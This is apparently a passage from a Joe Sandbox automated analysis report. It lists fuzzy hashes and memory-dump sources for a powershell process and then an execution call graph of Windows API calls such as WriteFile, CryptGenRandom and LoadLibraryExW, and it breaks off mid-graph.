                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 16f7529632cfd0de823a417871a56d80ab5f5e45c3962fb9af36fcd1e67057fe
                                                                                                                                                                                                                              • Instruction ID: 32853ff75460e566f3ebe545eb36efd6557c6005a88a5e24c802eca4a55e46c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f7529632cfd0de823a417871a56d80ab5f5e45c3962fb9af36fcd1e67057fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42414031E19A098FDB48EF6CD4855ACB7F1FF49315B14916DE41AE72A2CB35A843CB40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b24b0a7360fbd5ba294acfa00ecd65d410ae3fb170a41e875f41e0f8d2286f79
                                                                                                                                                                                                                              • Instruction ID: 215f47e566790129c6857447c1a64ced778e80b66a015ef887984b0fab143360
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b24b0a7360fbd5ba294acfa00ecd65d410ae3fb170a41e875f41e0f8d2286f79
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D111B36A58A1C8FDB54DE5CD4442ECBBB1FB58325F64916ED10AE7245CB32A8838B40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 20cd0a3fbff5b353ad751b912d128480b31da4ac92174ebc9c294c21e8af1259
                                                                                                                                                                                                                              • Instruction ID: 048e313547331950af53b47835cb389ec9898c52e120a2594ed711e7b5577377
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20cd0a3fbff5b353ad751b912d128480b31da4ac92174ebc9c294c21e8af1259
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F08C33B5CA290EEBA1965C78053F9B3D4EB88275F141677D85ED2280EA18D95642C0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d11efe61099d1eba348eee0083181da05b68936cc147a5a07aaa732069b81fbe
                                                                                                                                                                                                                              • Instruction ID: 8f2c97f12c1e392078e34338f743ad47a0de0c2b483c523eb3fde652ffee576d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d11efe61099d1eba348eee0083181da05b68936cc147a5a07aaa732069b81fbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0301677115CB0C4FD748EF0CE451AA9B7E0FB95364F10056EE58AC3661DB36E891CB45
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608243950.00007FFE7CAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CAA0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7caa0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 92bd6bec9ca79f23ebdd80e59461fbd4104f4af28d19a33d733678829ee65af0
                                                                                                                                                                                                                              • Instruction ID: 75bed536b82b64f5e4b2caa9a741d29dd5acbf0888ecf96b1b5a2d71ab87143e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92bd6bec9ca79f23ebdd80e59461fbd4104f4af28d19a33d733678829ee65af0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF014431A4891D8FDB84EB68D4543ACBBF1EB48365F2881ADC50EE7755CA799C43CB40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c4bbc8d5003f6fa30b00c8c50f101bb1171fc128ea244681259cf3d56c3d9a8a
                                                                                                                                                                                                                              • Instruction ID: e1b3fd86bdb6c73a711818bb53f48d58cba46894777c5b52875e993d2af63f77
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4bbc8d5003f6fa30b00c8c50f101bb1171fc128ea244681259cf3d56c3d9a8a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69F0E223EAE9AA0AFBA1E55C3C151B862D4EF54375F1D05BBE92DC20F3DC086C850381
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ec69875a90de280fb3ded6ee46840f9078668d21b45ead149f80b31edf53ccc5
                                                                                                                                                                                                                              • Instruction ID: bae1e612a0502e7dec317b5d7f058f3218c3eff1060d1714714d17fd83a9dc39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec69875a90de280fb3ded6ee46840f9078668d21b45ead149f80b31edf53ccc5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53F08233F9C9194FE358AA4CA4810BCB3E6EF95221B58047BE51EC3563DE25A8968240
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000044.00000002.1608914708.00007FFE7CB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CB70000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_68_2_7ffe7cb70000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 970eed2341acf4564ab1bd0ed12fa49544bb7178324dbca70b111dedd0d346d7
                                                                                                                                                                                                                              • Instruction ID: 23d7b5c2e3d7b6aed1124e50f48760586514f0da9ed5c6653a574a548e952284
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 970eed2341acf4564ab1bd0ed12fa49544bb7178324dbca70b111dedd0d346d7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77F0A733E9C5198FD7589A8C94814BCB3E6EF45210B580477E51DC3573EA25A8418250

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:7.8%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                                                                                              Total number of Nodes:1193
                                                                                                                                                                                                                              Total number of Limit Nodes:37
                                                                                                                                                                                                                              execution_graph 38199 7ff6256b3e71 38200 7ff6256b3e81 38199->38200 38201 7ff6256b3e89 38199->38201 38210 7ff625709a14 49 API calls 38200->38210 38203 7ff6256b3edd 38201->38203 38204 7ff6256b3ea3 38201->38204 38213 7ff62570a610 38203->38213 38211 7ff6256d331c 48 API calls 2 library calls 38204->38211 38208 7ff6256b3eab 38208->38203 38212 7ff6256b63e8 8 API calls 2 library calls 38208->38212 38210->38201 38211->38208 38212->38203 38214 7ff62570a61a 38213->38214 38215 7ff6256b3eef 38214->38215 38216 7ff62570a6a0 IsProcessorFeaturePresent 38214->38216 38217 7ff62570a6b7 38216->38217 38222 7ff62570a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38217->38222 38219 7ff62570a6ca 38223 7ff62570a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38219->38223 38222->38219 38224 7ff6256fa924 38226 7ff6256fa949 sprintf 38224->38226 38225 7ff6256fa97f CompareStringA 38226->38225 38227 7ff6256b82f0 38228 7ff6256b8306 38227->38228 38240 7ff6256b836f 38227->38240 38229 7ff6256b8324 38228->38229 38233 7ff6256b8371 38228->38233 38228->38240 38347 7ff6256d2414 61 API calls 38229->38347 38231 7ff6256b8347 38348 7ff6256d1998 138 API calls 38231->38348 38233->38240 38356 7ff6256d1998 138 API calls 38233->38356 38234 7ff6256b835e 38349 7ff6256d18ac 38234->38349 38250 7ff6256ba410 38240->38250 38241 7ff6256b8578 38242 7ff6256bb540 147 API calls 38241->38242 38247 7ff6256b858f 38242->38247 38243 7ff6256bb540 147 API calls 38243->38241 38244 7ff6256b8634 38245 7ff62570a610 _UnwindNestedFrames 8 API calls 38244->38245 38246 7ff6256b8663 38245->38246 38247->38244 38357 7ff6256b9628 175 API calls 38247->38357 38358 7ff6256e7a68 38250->38358 38253 7ff6256b853a 38255 7ff6256bb540 38253->38255 38260 7ff6256bb55f pre_c_initialization 38255->38260 38256 7ff6256bb5a1 38257 7ff6256bb5d8 38256->38257 38258 7ff6256bb5b8 38256->38258 38506 7ff6256e8c1c 38257->38506 38392 7ff6256baba0 38258->38392 38260->38256 38388 7ff6256ba4d0 38260->38388 38262 7ff62570a610 _UnwindNestedFrames 8 API calls 38263 7ff6256b854f 38262->38263 38263->38241 38263->38243 38264 7ff6256bb67f 38265 7ff6256bbc91 38264->38265 38267 7ff6256bbbae 38264->38267 38268 7ff6256bb6a5 38264->38268 38266 7ff6256bb5d3 38265->38266 38269 7ff6256d2574 126 API calls 38265->38269 38266->38262 38270 7ff6256e8d00 48 API calls 38267->38270 38268->38266 38281 7ff6256bb6b5 38268->38281 38296 7ff6256bb79f 38268->38296 38269->38266 38272 7ff6256bbc5c 38270->38272 38575 7ff6256e8d38 48 API calls 38272->38575 38277 7ff6256bbc69 38576 7ff6256e8d38 48 API calls 38277->38576 38279 7ff6256bbc76 38577 7ff6256e8d38 48 API calls 38279->38577 38281->38266 38540 7ff6256e8d00 38281->38540 38283 7ff6256bbc84 38578 7ff6256e8d88 48 API calls 38283->38578 38287 7ff6256bb726 38544 7ff6256e8d38 48 API calls 38287->38544 38289 7ff6256bb733 38290 7ff6256bb749 38289->38290 38545 7ff6256e8d88 48 API calls 38289->38545 38292 7ff6256bb75c 38290->38292 38546 7ff6256e8d38 48 API calls 38290->38546 38294 7ff6256bb779 38292->38294 38297 7ff6256e8d00 48 API calls 38292->38297 38547 7ff6256e8f94 38294->38547 38298 7ff6256bb8e5 38296->38298 38557 7ff6256bc3c8 CharLowerW CharUpperW 38296->38557 38297->38292 38558 7ff6256fd840 WideCharToMultiByte 38298->38558 38302 7ff6256bb9a1 38304 7ff6256e8d00 48 API calls 38302->38304 38305 7ff6256bb9c4 38304->38305 38561 7ff6256e8d38 48 API calls 38305->38561 38306 7ff6256bb910 38306->38302 38560 7ff6256b945c 55 API calls _UnwindNestedFrames 38306->38560 38308 7ff6256bb9d1 38562 7ff6256e8d38 48 API calls 38308->38562 38310 7ff6256bb9de 38563 7ff6256e8d88 48 API calls 38310->38563 38312 7ff6256bb9eb 38564 7ff6256e8d88 48 API calls 38312->38564 38314 7ff6256bba0b 38315 7ff6256e8d00 48 API calls 38314->38315 38316 7ff6256bba27 38315->38316 38565 7ff6256e8d88 48 API calls 38316->38565 38318 7ff6256bba37 38319 7ff6256bba49 38318->38319 38566 7ff6256fbc48 15 API calls 38318->38566 38567 7ff6256e8d88 48 API calls 38319->38567 38322 7ff6256bba59 38323 7ff6256e8d00 48 API calls 38322->38323 38324 7ff6256bba66 38323->38324 38325 7ff6256e8d00 48 API calls 38324->38325 38326 7ff6256bba78 38325->38326 38568 7ff6256e8d38 48 API calls 38326->38568 38328 7ff6256bba85 38569 7ff6256e8d88 48 API calls 38328->38569 38330 7ff6256bba92 38331 7ff6256bbacd 38330->38331 38570 7ff6256e8d88 48 API calls 38330->38570 38572 7ff6256e8e3c 38331->38572 38333 7ff6256bbab2 38571 7ff6256e8d88 48 API calls 38333->38571 38336 7ff6256bbb33 38339 7ff6256bbb53 38336->38339 38342 7ff6256e8e3c 48 API calls 38336->38342 38338 7ff6256e8d00 48 API calls 38340 7ff6256bbb09 38338->38340 38343 7ff6256bbb6e 38339->38343 38344 7ff6256e8e3c 48 API calls 38339->38344 38340->38336 38341 7ff6256e8e3c 48 API calls 38340->38341 38341->38336 38342->38339 38345 7ff6256e8f94 126 API calls 38343->38345 38344->38343 38345->38266 38347->38231 38348->38234 38350 7ff6256d18db 38349->38350 38351 7ff6256d18ca 38349->38351 38350->38240 38351->38350 38352 7ff6256d18de 38351->38352 38353 7ff6256d18d6 38351->38353 38805 7ff6256d1930 38352->38805 38800 7ff6256d1c24 38353->38800 38356->38240 38357->38244 38359 7ff6256e7a8d 38358->38359 38360 7ff6256ba434 38358->38360 38361 7ff6256e7aaf 38359->38361 38371 7ff6256e7340 157 API calls 38359->38371 38360->38253 38366 7ff6256d22e0 38360->38366 38361->38360 38363 7ff6256d22e0 12 API calls 38361->38363 38364 7ff6256e7adf 38363->38364 38372 7ff6256d2440 38364->38372 38382 7ff6256d20b4 38366->38382 38368 7ff6256d2307 38368->38253 38371->38361 38373 7ff6256d2454 38372->38373 38374 7ff6256d246a SetFilePointer 38372->38374 38375 7ff6256d24ad 38373->38375 38380 7ff6256ccd00 10 API calls 38373->38380 38374->38375 38376 7ff6256d248d GetLastError 38374->38376 38375->38360 38376->38375 38377 7ff6256d2497 38376->38377 38377->38375 38381 7ff6256ccd00 10 API calls 38377->38381 38383 7ff6256d20d0 38382->38383 38386 7ff6256d2130 38382->38386 38384 7ff6256d2102 SetFilePointer 38383->38384 38385 7ff6256d2126 GetLastError 38384->38385 38384->38386 38385->38386 38386->38368 38387 7ff6256ccd00 10 API calls 38386->38387 38390 7ff6256ba4ea 38388->38390 38389 7ff6256ba4ee 38389->38256 38390->38389 38391 7ff6256d2440 12 API calls 38390->38391 38391->38389 38393 7ff6256babbf pre_c_initialization 38392->38393 38394 7ff6256e8c1c 48 API calls 38393->38394 38400 7ff6256babf5 38394->38400 38395 7ff6256baca7 38396 7ff6256bb4af 38395->38396 38397 7ff6256bacbf 38395->38397 38401 7ff6256bb4ff 38396->38401 38402 7ff6256d2574 126 API calls 38396->38402 38398 7ff6256bacc8 38397->38398 38399 7ff6256bb35c 38397->38399 38407 7ff6256bacdd 38398->38407 38445 7ff6256baea7 38398->38445 38505 7ff6256bad60 38398->38505 38404 7ff6256e8eec 48 API calls 38399->38404 38400->38395 38400->38396 38579 7ff6256c9be0 38400->38579 38619 7ff6256e72c0 38401->38619 38402->38401 38406 7ff6256bb395 38404->38406 38410 7ff6256bb3ad 38406->38410 38618 7ff6256b9e2c 48 API calls 38406->38618 38411 7ff6256bad68 38407->38411 38412 7ff6256bace6 38407->38412 38409 7ff6256c90b8 75 API calls 38413 7ff6256bac8f 38409->38413 38417 7ff6256e8eec 48 API calls 38410->38417 38415 7ff6256e8eec 48 API calls 38411->38415 38412->38505 38590 7ff6256e8eec 38412->38590 38413->38395 38422 7ff6256d2574 126 API calls 38413->38422 38418 7ff6256bad9c 38415->38418 38416 7ff62570a610 _UnwindNestedFrames 8 API calls 38419 7ff6256bb52b 38416->38419 38420 7ff6256bb3d4 38417->38420 38423 7ff6256e8eec 48 API calls 38418->38423 38419->38266 38424 7ff6256bb3e6 38420->38424 38427 7ff6256e8eec 48 API calls 38420->38427 38422->38395 38426 7ff6256bada9 38423->38426 38429 7ff6256e8eec 48 API calls 38424->38429 38431 7ff6256e8eec 48 API calls 38426->38431 38427->38424 38428 7ff6256e8eec 48 API calls 38430 7ff6256bad31 38428->38430 38432 7ff6256bb451 38429->38432 38433 7ff6256e8eec 48 API calls 38430->38433 38434 7ff6256badb5 38431->38434 38435 7ff6256bb471 38432->38435 38441 7ff6256e8eec 48 API calls 38432->38441 38436 7ff6256bad46 38433->38436 38437 7ff6256e8eec 48 API calls 38434->38437 38439 7ff6256bb486 38435->38439 38442 7ff6256e8e3c 48 API calls 38435->38442 38438 7ff6256e8f94 126 API calls 38436->38438 38440 7ff6256badc2 38437->38440 38438->38505 38443 7ff6256e8f94 126 API calls 38439->38443 38444 7ff6256e8d00 48 API calls 38440->38444 38441->38435 38442->38439 38443->38505 38447 7ff6256badcf 38444->38447 38446 7ff6256bafda 38445->38446 38608 7ff6256b9b64 48 API calls _UnwindNestedFrames 38445->38608 38454 7ff6256baff2 38446->38454 38609 7ff6256b9d98 48 API calls 38446->38609 38448 7ff6256c90b8 75 API calls 38447->38448 38450 7ff6256bae22 38448->38450 38452 7ff6256e8e3c 48 API calls 38450->38452 38453 7ff6256bae33 38452->38453 38455 7ff6256e8e3c 48 API calls 38453->38455 38458 7ff6256bb02b 38454->38458 38610 7ff6256b9efc 48 API calls _UnwindNestedFrames 38454->38610 38456 7ff6256bae48 38455->38456 38594 7ff6256f9ce4 38456->38594 38457 7ff6256bb0af 38460 7ff6256bb0c8 38457->38460 38612 7ff6256ba1a0 48 API calls 2 library calls 38457->38612 38458->38457 38611 7ff6256ba2c8 48 API calls 38458->38611 38463 7ff6256bb0e2 38460->38463 38613 7ff6256ba350 48 API calls _UnwindNestedFrames 38460->38613 38467 7ff6256e8eec 48 API calls 38463->38467 38469 7ff6256bb0fc 38467->38469 38471 7ff6256e8eec 48 API calls 38469->38471 38472 7ff6256bb109 38471->38472 38474 7ff6256bb11f 38472->38474 38476 7ff6256e8eec 48 API calls 38472->38476 38473 7ff6256e8e3c 48 API calls 38475 7ff6256bae80 38473->38475 38604 7ff6256e8e94 38474->38604 38478 7ff6256e8f94 126 API calls 38475->38478 38476->38474 38478->38505 38480 7ff6256e8eec 48 API calls 38481 7ff6256bb147 38480->38481 38482 7ff6256e8e94 48 API calls 38481->38482 38483 7ff6256bb15f 38482->38483 38484 7ff6256e8eec 48 API calls 38483->38484 38489 7ff6256bb16c 38484->38489 38485 7ff6256bb18a 38486 7ff6256bb1a9 38485->38486 38615 7ff6256e8d88 48 API calls 38485->38615 38488 7ff6256e8e94 48 API calls 38486->38488 38490 7ff6256bb1bc 38488->38490 38489->38485 38614 7ff6256e8d88 48 API calls 38489->38614 38492 7ff6256e8eec 48 API calls 38490->38492 38493 7ff6256bb1d6 38492->38493 38495 7ff6256bb1e9 38493->38495 38616 7ff6256bc3c8 CharLowerW CharUpperW 38493->38616 38495->38495 38496 7ff6256e8eec 48 API calls 38495->38496 38497 7ff6256bb21f 38496->38497 38498 7ff6256e8e3c 48 API calls 38497->38498 38499 7ff6256bb230 38498->38499 38500 7ff6256bb247 38499->38500 38501 7ff6256e8e3c 48 API calls 38499->38501 38502 7ff6256e8f94 126 API calls 38500->38502 38501->38500 38503 7ff6256bb278 38502->38503 38503->38505 38617 7ff6256e70d8 4 API calls 2 library calls 38503->38617 38505->38416 38660 7ff6256e8f28 38506->38660 38509 7ff6256c90b8 38510 7ff6256c9123 38509->38510 38517 7ff6256c91a9 38509->38517 38510->38517 38678 7ff6256f7e74 38510->38678 38511 7ff62570a610 _UnwindNestedFrames 8 API calls 38513 7ff6256bb66e 38511->38513 38525 7ff6256d2574 38513->38525 38515 7ff6256fd840 WideCharToMultiByte 38516 7ff6256c9157 38515->38516 38516->38517 38518 7ff6256c91c4 38516->38518 38519 7ff6256c916a 38516->38519 38517->38511 38697 7ff6256c9338 12 API calls _UnwindNestedFrames 38518->38697 38521 7ff6256c916f 38519->38521 38522 7ff6256c91ab 38519->38522 38521->38517 38682 7ff6256c98b0 38521->38682 38696 7ff6256c951c 71 API calls _UnwindNestedFrames 38522->38696 38526 7ff6256d25a5 38525->38526 38530 7ff6256d259e 38525->38530 38527 7ff6256d25ab GetStdHandle 38526->38527 38539 7ff6256d25ba 38526->38539 38527->38539 38528 7ff6256d2619 WriteFile 38528->38539 38529 7ff6256d25cf WriteFile 38531 7ff6256d260b 38529->38531 38529->38539 38530->38264 38531->38529 38531->38539 38532 7ff6256d2658 GetLastError 38532->38539 38534 7ff6256d2684 SetLastError 38534->38539 38536 7ff6256d2721 38797 7ff6256ccf14 10 API calls 38536->38797 38539->38528 38539->38529 38539->38530 38539->38532 38539->38536 38794 7ff6256d3144 9 API calls 2 library calls 38539->38794 38795 7ff6256ccf34 10 API calls 38539->38795 38796 7ff6256cc95c 126 API calls 38539->38796 38541 7ff6256b161c 48 API calls 38540->38541 38542 7ff6256bb719 38541->38542 38543 7ff6256e8d38 48 API calls 38542->38543 38543->38287 38544->38289 38545->38290 38546->38292 38548 7ff6256e9131 38547->38548 38550 7ff6256e8fcf 38547->38550 38548->38266 38549 7ff6256e905d 38551 7ff6256e90e0 38549->38551 38552 7ff6256b161c 48 API calls 38549->38552 38550->38549 38798 7ff6256cca6c 48 API calls 3 library calls 38550->38798 38551->38548 38553 7ff6256d2574 126 API calls 38551->38553 38552->38551 38553->38548 38555 7ff6256e904c 38799 7ff6256cca40 61 API calls _CxxThrowException 38555->38799 38557->38298 38559 7ff6256bb8f8 CharToOemA 38558->38559 38559->38306 38560->38302 38561->38308 38562->38310 38563->38312 38564->38314 38565->38318 38566->38319 38567->38322 38568->38328 38569->38330 38570->38333 38571->38331 38573 7ff6256b161c 48 API calls 38572->38573 38574 7ff6256bbaf2 38573->38574 38574->38336 38574->38338 38574->38340 38575->38277 38576->38279 38577->38283 38578->38265 38623 7ff6256c901c CryptAcquireContextW 38579->38623 38583 7ff6256c9c2a 38584 7ff6256f9ce4 8 API calls 38583->38584 38585 7ff6256c9c49 38584->38585 38586 7ff6256f9b70 8 API calls 38585->38586 38587 7ff6256c9c5b memcpy_s 38586->38587 38588 7ff62570a610 _UnwindNestedFrames 8 API calls 38587->38588 38589 7ff6256bac34 38588->38589 38589->38409 38591 7ff6256e8efc 38590->38591 38592 7ff6256e8d00 48 API calls 38591->38592 38593 7ff6256bad24 38591->38593 38592->38591 38593->38428 38595 7ff6256bae60 38594->38595 38596 7ff6256f9d15 memcpy_s 38594->38596 38598 7ff6256f9b70 38595->38598 38596->38595 38639 7ff6256f9d74 38596->38639 38601 7ff6256f9bad memcpy_s 38598->38601 38602 7ff6256f9bd9 memcpy_s 38598->38602 38599 7ff6256f9d74 8 API calls 38600 7ff6256bae6d 38599->38600 38600->38473 38601->38602 38603 7ff6256f9d74 8 API calls 38601->38603 38602->38599 38603->38602 38605 7ff6256e8eac 38604->38605 38606 7ff6256e8d00 48 API calls 38605->38606 38607 7ff6256bb137 38605->38607 38606->38605 38607->38480 38608->38446 38609->38454 38610->38458 38611->38457 38612->38460 38613->38463 38614->38485 38615->38486 38616->38495 38617->38505 38618->38410 38620 7ff6256e72dd 38619->38620 38621 7ff6256e7304 38620->38621 38643 7ff62570a480 38620->38643 38621->38505 38624 7ff6256c907e 38623->38624 38625 7ff6256c9057 CryptGenRandom CryptReleaseContext 38623->38625 38627 7ff6256c9c9c 11 API calls 38624->38627 38625->38624 38626 7ff6256c9089 38625->38626 38628 7ff6256c9c9c 38626->38628 38627->38626 38633 7ff6256fc0a8 GetSystemTime SystemTimeToFileTime 38628->38633 38630 7ff6256c9cc5 38636 7ff625712d74 38630->38636 38634 7ff62570a610 _UnwindNestedFrames 8 API calls 38633->38634 38635 7ff6256fc0f1 38634->38635 38635->38630 38637 7ff6256c9cd7 38636->38637 38638 7ff625712d8b QueryPerformanceCounter 38636->38638 38637->38583 38638->38637 38640 7ff6256f9dbc 38639->38640 38640->38640 38641 7ff62570a610 _UnwindNestedFrames 8 API calls 38640->38641 38642 7ff6256f9f40 38641->38642 38642->38596 38644 7ff62570a444 38643->38644 38645 7ff62570a47a 38644->38645 38649 7ff6257136c0 38644->38649 38652 7ff62570b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38644->38652 38653 7ff62570b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38644->38653 38645->38621 38654 7ff625713700 38649->38654 38659 7ff625716938 EnterCriticalSection 38654->38659 38656 7ff62571370d 38657 7ff625716998 fflush LeaveCriticalSection 38656->38657 38658 7ff6257136d2 38657->38658 38658->38644 38663 7ff6256b161c 38660->38663 38662 7ff6256bb601 38662->38264 38662->38265 38662->38509 38664 7ff6256b1640 38663->38664 38673 7ff6256b16aa memcpy_s 38663->38673 38665 7ff6256b166d 38664->38665 38674 7ff6256cca6c 48 API calls 3 library calls 38664->38674 38669 7ff6256b16d4 38665->38669 38670 7ff6256b168e 38665->38670 38667 7ff6256b1661 38675 7ff6256ccb64 8 API calls 38667->38675 38669->38673 38677 7ff6256ccb64 8 API calls 38669->38677 38670->38673 38676 7ff6256ccb64 8 API calls 38670->38676 38673->38662 38674->38667 38679 7ff6256f7e95 38678->38679 38681 7ff6256c9143 38678->38681 38698 7ff6256f7ec8 38679->38698 38681->38515 38683 7ff6256c9b45 38682->38683 38687 7ff6256c9920 38682->38687 38684 7ff62570a610 _UnwindNestedFrames 8 API calls 38683->38684 38685 7ff6256c9b61 38684->38685 38685->38517 38688 7ff6256c996d 38687->38688 38689 7ff6256c9b75 38687->38689 38730 7ff6256f7da8 38687->38730 38688->38688 38737 7ff6256ca0f4 38688->38737 38690 7ff6256f7f24 68 API calls 38689->38690 38693 7ff6256c9acb 38690->38693 38692 7ff6256c99d0 38692->38692 38753 7ff6256f7f24 38692->38753 38693->38683 38767 7ff6256f4ea8 8 API calls _UnwindNestedFrames 38693->38767 38696->38517 38697->38517 38699 7ff6256f7efa memcpy_s 38698->38699 38704 7ff6256f7fb5 38699->38704 38712 7ff6256fb3f0 38699->38712 38702 7ff6256f805c GetCurrentProcessId 38706 7ff6256f8034 38702->38706 38703 7ff6256f7ff1 38703->38706 38721 7ff6256cca6c 48 API calls 3 library calls 38703->38721 38704->38702 38704->38703 38705 7ff6256f7f7e GetProcAddressForCaller GetProcAddress 38705->38704 38706->38681 38708 7ff6256f801f 38722 7ff6256ccda4 10 API calls 2 library calls 38708->38722 38710 7ff6256f8027 38723 7ff6256cca40 61 API calls _CxxThrowException 38710->38723 38724 7ff62570a5a0 38712->38724 38715 7ff6256fb42c 38726 7ff6256e48bc 38715->38726 38716 7ff6256fb428 38719 7ff62570a610 _UnwindNestedFrames 8 API calls 38716->38719 38720 7ff6256f7f72 38719->38720 38720->38704 38720->38705 38721->38708 38722->38710 38723->38706 38725 7ff6256fb3fc GetSystemDirectoryW 38724->38725 38725->38715 38725->38716 38727 7ff6256e48cb pre_c_initialization 38726->38727 38728 7ff62570a610 _UnwindNestedFrames 8 API calls 38727->38728 38729 7ff6256e493a LoadLibraryExW 38728->38729 38729->38716 38731 7ff6256f7e74 68 API calls 38730->38731 38732 7ff6256f7ddc 38731->38732 38733 7ff6256f7e74 68 API calls 38732->38733 38734 7ff6256f7def 38733->38734 38735 7ff62570a610 _UnwindNestedFrames 8 API calls 38734->38735 38736 7ff6256f7e43 38735->38736 38736->38687 38739 7ff6256ca15c memcpy_s 38737->38739 38740 7ff6256ca192 38739->38740 38741 7ff6256ca34d 38739->38741 38746 7ff6256ca358 38739->38746 38747 7ff6256ca352 38739->38747 38768 7ff6256c9dd8 38740->38768 38788 7ff62570a774 8 API calls __report_securityfailure 38741->38788 38743 7ff6256ca35e 38790 7ff62570a774 8 API calls __report_securityfailure 38746->38790 38789 7ff62570a774 8 API calls __report_securityfailure 38747->38789 38748 7ff6256ca1d9 38749 7ff6256c9dd8 8 API calls 38748->38749 38750 7ff6256ca2f1 38748->38750 38749->38748 38751 7ff62570a610 _UnwindNestedFrames 8 API calls 38750->38751 38752 7ff6256ca33b 38751->38752 38752->38692 38754 7ff6256f7f5e 38753->38754 38758 7ff6256f7fb5 38753->38758 38755 7ff6256fb3f0 10 API calls 38754->38755 38754->38758 38756 7ff6256f7f72 38755->38756 38756->38758 38759 7ff6256f7f7e GetProcAddressForCaller GetProcAddress 38756->38759 38757 7ff6256f805c GetCurrentProcessId 38760 7ff6256f8034 38757->38760 38758->38757 38761 7ff6256f7ff1 38758->38761 38759->38758 38760->38693 38761->38760 38791 7ff6256cca6c 48 API calls 3 library calls 38761->38791 38763 7ff6256f801f 38792 